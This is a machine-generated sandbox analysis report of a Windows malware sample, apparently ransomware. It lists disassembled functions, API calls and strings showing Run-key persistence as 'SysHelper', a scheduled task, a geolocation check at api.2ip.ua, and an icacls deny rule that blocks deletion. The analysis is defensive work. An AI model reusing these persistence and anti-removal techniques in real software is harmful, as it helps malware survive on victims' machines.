                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 688 f1d240-f1d274 CoInitialize 689 f1d276-f1d278 688->689 690 f1d27d-f1d2dd CoInitializeSecurity call f24690 CoCreateInstance 688->690 691 f1da8e-f1da92 689->691 697 f1d2e3-f1d3ca VariantInit * 4 VariantClear * 4 690->697 698 f1da3c-f1da44 CoUninitialize 690->698 693 f1da94-f1da9c call f32587 691->693 694 f1da9f-f1dab1 691->694 693->694 704 f1d3e2-f1d3fe call f1b140 697->704 705 f1d3cc-f1d3dd CoUninitialize 697->705 700 f1da69-f1da6d 698->700 702 f1da7a-f1da8a 700->702 703 f1da6f-f1da77 call f32587 700->703 702->691 703->702 711 f1d400-f1d402 704->711 712 f1d404 704->712 705->700 713 f1d406-f1d424 call f1b1d0 711->713 712->713 717 f1d426-f1d437 CoUninitialize 713->717 718 f1d43c-f1d451 call f1b140 713->718 717->700 722 f1d453-f1d455 718->722 723 f1d457 718->723 724 f1d459-f1d494 call f1b1d0 722->724 723->724 730 f1d496-f1d4a7 CoUninitialize 724->730 731 f1d4ac-f1d4c2 724->731 730->700 734 f1d4c8-f1d4dd call f1b140 731->734 735 f1da2a-f1da37 731->735 739 f1d4e3 734->739 740 f1d4df-f1d4e1 734->740 735->698 741 f1d4e5-f1d508 call f1b1d0 739->741 740->741 741->735 746 f1d50e-f1d524 741->746 746->735 748 f1d52a-f1d542 746->748 748->735 751 f1d548-f1d55e 748->751 751->735 753 f1d564-f1d57c 751->753 753->735 756 f1d582-f1d59b 753->756 756->735 758 f1d5a1-f1d5b6 call f1b140 756->758 761 f1d5b8-f1d5ba 758->761 762 f1d5bc 758->762 763 f1d5be-f1d5e1 call f1b1d0 761->763 762->763 763->735 768 f1d5e7-f1d5fd 763->768 768->735 770 f1d603-f1d626 768->770 770->735 773 f1d62c-f1d651 770->773 773->735 776 f1d657-f1d666 773->776 776->735 778 f1d66c-f1d681 call f1b140 776->778 781 f1d683-f1d685 778->781 782 f1d687 778->782 783 f1d689-f1d6a3 call f1b1d0 781->783 782->783 783->735 787 f1d6a9-f1d6be call f1b140 783->787 790 f1d6c0-f1d6c2 787->790 791 f1d6c4 787->791 792 f1d6c6-f1d6e0 call f1b1d0 790->792 791->792 792->735 796 f1d6e6-f1d6f4 792->796 796->735 798 f1d6fa-f1d70f call f1b140 796->798 801 f1d711-f1d713 798->801 802 f1d715 798->802 803 f1d717-f1d731 call f1b1d0 801->803 802->803 803->735 807 f1d737-f1d74c call f1b140 803->807 810 f1d752 807->810 811 f1d74e-f1d750 807->811 812 f1d754-f1d76e call f1b1d0 810->812 811->812 812->735 816 f1d774-f1d7ce call f33aaf call f33551 call f328e0 call f22c40 call f22900 812->816 827 f1d7d0 816->827 828 f1d7d2-f1d7e3 call f1b140 816->828 827->828 831 f1d7e5-f1d7e7 828->831 832 f1d7e9 828->832 833 f1d7eb-f1d819 call f1b1d0 call f23210 831->833 832->833 833->735 840 f1d81f-f1d835 833->840 840->735 842 f1d83b-f1d85e 840->842 842->735 845 f1d864-f1d889 842->845 845->735 848 f1d88f-f1d8ab call f1b140 845->848 851 f1d8b1 848->851 852 f1d8ad-f1d8af 848->852 853 f1d8b3-f1d8cd call f1b1d0 851->853 852->853 857 f1d8dd-f1d8f2 call f1b140 853->857 858 f1d8cf-f1d8d8 853->858 862 f1d8f4-f1d8f6 857->862 863 f1d8f8 857->863 858->735 864 f1d8fa-f1d91d call f1b1d0 862->864 863->864 864->735 869 f1d923-f1d98d call f1b400 VariantInit * 2 call f1b140 864->869 874 f1d993 869->874 875 f1d98f-f1d991 869->875 876 f1d995-f1da0e call f1b1d0 VariantClear * 3 874->876 875->876 880 f1da10-f1da27 call f3052a 876->880 881 f1da46-f1da67 CoUninitialize 876->881 880->735 881->700
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1D26C
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00F1D28F
                                                                                                        • CoCreateInstance.OLE32(00FE506C,00000000,00000001,00FE4FEC,?,?,00000000,000000FF), ref: 00F1D2D5
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D2F0
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D309
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D322
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D33B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D397
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3A4
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3B1
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3C2
                                                                                                        • CoUninitialize.OLE32 ref: 00F1D3D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                        • Opcode ID: 0453c9feae5c0aab30880877ea93059f339cc4302196bb2778f98a990306ee32
                                                                                                        • Instruction ID: 498001fc2fcb2d2b8ece050d4b8d836a28908f7ba7d63bf529af21893e918b6b
                                                                                                        • Opcode Fuzzy Hash: 0453c9feae5c0aab30880877ea93059f339cc4302196bb2778f98a990306ee32
                                                                                                        • Instruction Fuzzy Hash: 1F529271E00219DFDB00DBA4CC58FEEBBB5BF49704F148198E505AB291DB35AE85DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F22235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F22240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F22248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F22256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F22275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F22280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F22291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F222AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F222B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F222CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F222FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F22315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F2232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F22347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 12c830da8c6c2eb23731f2c20f56310586041b1682be42ab22b1bd39ab2c92f6
                                                                                                        • Instruction ID: 027481fe0bb6f3984bd14ee2f382873231a77a6494f0eccd12d2cbff97a58a63
                                                                                                        • Opcode Fuzzy Hash: 12c830da8c6c2eb23731f2c20f56310586041b1682be42ab22b1bd39ab2c92f6
                                                                                                        • Instruction Fuzzy Hash: 00318D71E0121EBBDB10EFA59C49EAEB7BCEF49314F00406AF544E7150DA789E41EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 903 f1cf10-f1cfb0 call f3f7c0 call f3b420 InternetOpenW call f25c10 InternetOpenUrlW 910 f1cfb2-f1cfb4 903->910 911 f1cfb9-f1cffb InternetReadFile InternetCloseHandle * 2 call f256d0 903->911 912 f1d213-f1d217 910->912 914 f1d000-f1d01d 911->914 915 f1d224-f1d236 912->915 916 f1d219-f1d221 call f32587 912->916 917 f1d023-f1d02c 914->917 918 f1d01f-f1d021 914->918 916->915 921 f1d030-f1d035 917->921 920 f1d039-f1d069 call f256d0 call f24300 918->920 928 f1d1cb 920->928 929 f1d06f-f1d08b call f23010 920->929 921->921 923 f1d037 921->923 923->920 930 f1d1cd-f1d1d1 928->930 938 f1d0b9-f1d0bd 929->938 939 f1d08d-f1d091 929->939 932 f1d1d3-f1d1db call f32587 930->932 933 f1d1de-f1d1f4 930->933 932->933 936 f1d201-f1d20f 933->936 937 f1d1f6-f1d1fe call f32587 933->937 936->912 937->936 941 f1d0cd-f1d0e1 call f24300 938->941 942 f1d0bf-f1d0ca call f32587 938->942 944 f1d093-f1d09b call f32587 939->944 945 f1d09e-f1d0b4 call f23d40 939->945 941->928 954 f1d0e7-f1d149 call f23010 941->954 942->941 944->945 945->938 957 f1d150-f1d15a 954->957 958 f1d160-f1d162 957->958 959 f1d15c-f1d15e 957->959 960 f1d165-f1d16a 958->960 961 f1d16e-f1d18b call f1b650 959->961 960->960 962 f1d16c 960->962 965 f1d19a-f1d19e 961->965 966 f1d18d-f1d18f 961->966 962->961 965->957 968 f1d1a0 965->968 966->965 967 f1d191-f1d198 966->967 967->965 969 f1d1c7-f1d1c9 967->969 970 f1d1a2-f1d1a6 968->970 969->970 971 f1d1b3-f1d1c5 970->971 972 f1d1a8-f1d1b0 call f32587 970->972 971->930 972->971
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F1CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        • Opcode ID: 7bbc927d72beea8b9493eb16fdb7b11995dd582fd6980b657e0057080dff0f5a
                                                                                                        • Instruction ID: 4a84508e599a688f1c611de8fb0495b32394ec6f8ddce907f6975f1efce63f1e
                                                                                                        • Opcode Fuzzy Hash: 7bbc927d72beea8b9493eb16fdb7b11995dd582fd6980b657e0057080dff0f5a
                                                                                                        • Instruction Fuzzy Hash: 9891D371D00259EBEF25CFA0DC45BEEBBB4AF05304F244158E4457B281D7BA5A88EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 606 f21cd0-f21d1a call f3f7c0 RegOpenKeyExW 609 f21d20-f21d8d call f3b420 RegQueryValueExW RegCloseKey 606->609 610 f22207-f22216 606->610 613 f21d93-f21d9c 609->613 614 f21d8f-f21d91 609->614 616 f21da0-f21da9 613->616 615 f21daf-f21dcb call f25c10 614->615 620 f21dd1-f21df8 lstrlenA call f23520 615->620 621 f21e7c-f21e87 615->621 616->616 617 f21dab-f21dad 616->617 617->615 629 f21dfa-f21dfe 620->629 630 f21e28-f21e2c 620->630 622 f21e94-f21f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 f21e89-f21e91 call f32587 621->623 635 f21f36-f21f38 622->635 636 f21f3a-f21f3f 622->636 623->622 631 f21e00 629->631 632 f21e0b-f21e1f 629->632 633 f21e2e-f21e39 call f32587 630->633 634 f21e3c-f21e50 PathFileExistsW 630->634 637 f21e03-f21e08 call f32587 631->637 638 f21e23 call f245a0 632->638 633->634 634->621 642 f21e52-f21e57 634->642 640 f21f4f-f21f96 call f25c10 RpcStringFreeW PathAppendW CreateDirectoryW 635->640 641 f21f40-f21f49 636->641 637->632 638->630 654 f21f98-f21fa0 640->654 655 f21fce-f21fe9 640->655 641->641 645 f21f4b-f21f4d 641->645 646 f21e6a-f21e6e 642->646 647 f21e59-f21e5e 642->647 645->640 646->610 651 f21e74-f21e77 646->651 647->646 649 f21e60-f21e65 call f24690 647->649 649->646 652 f221ff-f22204 call f32587 651->652 652->610 659 f21fa2-f21fa4 654->659 660 f21fa6-f21faf 654->660 656 f21feb-f21fed 655->656 657 f21fef-f21ff8 655->657 664 f2200f-f22076 call f25c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->664 665 f22000-f22009 657->665 662 f21fbf-f21fc9 call f25c10 659->662 663 f21fb0-f21fb9 660->663 662->655 663->663 666 f21fbb-f21fbd 663->666 671 f221d1-f221d5 664->671 672 f2207c-f22107 call f3b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 664->672 665->665 668 f2200b-f2200d 665->668 666->662 668->664 673 f221e2-f221fa 671->673 674 f221d7-f221df call f32587 671->674 679 f22115-f221a8 call f3b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->679 680 f22109-f22110 call f23260 672->680 673->610 677 f221fc 673->677 674->673 677->652 685 f221b2-f221b8 679->685 686 f221aa-f221b0 GetLastError 679->686 680->679 687 f221c0-f221cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                        • _memset.LIBCMT ref: 00F21D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F21E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F21EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F21EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F21EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F21ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F21EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F21EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F21F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F21F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F21F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F21F8E
                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F2202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F22036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F2204C
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F2206E
                                                                                                        • _memset.LIBCMT ref: 00F22090
                                                                                                        • lstrcpyW.KERNEL32(?,010102FC), ref: 00F220AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F220C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F220CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F220D7
                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F220F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F220FC
                                                                                                        • _memset.LIBCMT ref: 00F22120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F22146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F22158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F2216D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        • Opcode ID: 4f060a76cc6fd37a75fa07ebd396ac214d7a99dd6b5ddd076b58190ac56d3886
                                                                                                        • Instruction ID: 960151772c1c3069d62a638938a4d60ece35dfc946b48dd513811153b9e4b5d3
                                                                                                        • Opcode Fuzzy Hash: 4f060a76cc6fd37a75fa07ebd396ac214d7a99dd6b5ddd076b58190ac56d3886
                                                                                                        • Instruction Fuzzy Hash: 0DE17C71D0022EABDF24DBA0DD49BEEB7B9BF04304F10416AE505E6190EB746A84EB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 975 f33576-f3358f 976 f33591-f3359b call f35208 call f342d2 975->976 977 f335a9-f335be call f3b420 975->977 984 f335a0 976->984 977->976 983 f335c0-f335c3 977->983 985 f335d7-f335dd 983->985 986 f335c5 983->986 987 f335a2-f335a8 984->987 990 f335e9 call f3fb64 985->990 991 f335df 985->991 988 f335c7-f335c9 986->988 989 f335cb-f335d5 call f35208 986->989 988->985 988->989 989->984 995 f335ee-f335fa call f3f803 990->995 991->989 994 f335e1-f335e7 991->994 994->989 994->990 999 f33600-f3360c call f3f82d 995->999 1000 f337e5-f337ef call f342fd 995->1000 999->1000 1005 f33612-f3361e call f3f857 999->1005 1005->1000 1008 f33624-f3362b 1005->1008 1009 f3369b-f336a6 call f3f939 1008->1009 1010 f3362d 1008->1010 1009->987 1017 f336ac-f336af 1009->1017 1012 f33637-f33653 call f3f939 1010->1012 1013 f3362f-f33635 1010->1013 1012->987 1018 f33659-f3365c 1012->1018 1013->1009 1013->1012 1019 f336b1-f336ba call f3fbb4 1017->1019 1020 f336de-f336eb 1017->1020 1021 f33662-f3366b call f3fbb4 1018->1021 1022 f3379e-f337a0 1018->1022 1019->1020 1028 f336bc-f336dc 1019->1028 1023 f336ed-f336fc call f405a0 1020->1023 1021->1022 1031 f33671-f33689 call f3f939 1021->1031 1022->987 1032 f33709-f33730 call f404f0 call f405a0 1023->1032 1033 f336fe-f33706 1023->1033 1028->1023 1031->987 1038 f3368f-f33696 1031->1038 1041 f33732-f3373b 1032->1041 1042 f3373e-f33765 call f404f0 call f405a0 1032->1042 1033->1032 1038->1022 1041->1042 1047 f33773-f33782 call f404f0 1042->1047 1048 f33767-f33770 1042->1048 1051 f33784 1047->1051 1052 f337af-f337c8 1047->1052 1048->1047 1053 f33786-f33788 1051->1053 1054 f3378a-f33798 1051->1054 1055 f3379b 1052->1055 1056 f337ca-f337e3 1052->1056 1053->1054 1057 f337a5-f337a7 1053->1057 1054->1055 1055->1022 1056->1022 1057->1022 1058 f337a9 1057->1058 1058->1052 1059 f337ab-f337ad 1058->1059 1059->1022 1059->1052
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F335B1
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F33680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3369D
                                                                                                        • __allrem.LIBCMT ref: 00F336F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3370F
                                                                                                        • __allrem.LIBCMT ref: 00F33726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33744
                                                                                                        • __allrem.LIBCMT ref: 00F3375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33779
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503770280-0
                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction ID: afc7a2d26dacf512abb0345b35291f1611faeb933c5fe893d01d8073f8501876
                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction Fuzzy Hash: 9B7197F2E00717ABD714DE79CC42B5AB7A8AF44374F14423AF914D7681E774EA40AB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F3FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1060 f3fb64-f3fb77 call f38520 1063 f3fba5-f3fbaa call f38565 1060->1063 1064 f3fb79-f3fb8c call f38af7 1060->1064 1069 f3fb99-f3fba0 call f3fbab 1064->1069 1070 f3fb8e call f3fe47 1064->1070 1069->1063 1073 f3fb93 1070->1073 1073->1069
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3FB7B
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00F33B69,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • __tzset_nolock.LIBCMT ref: 00F3FB8E
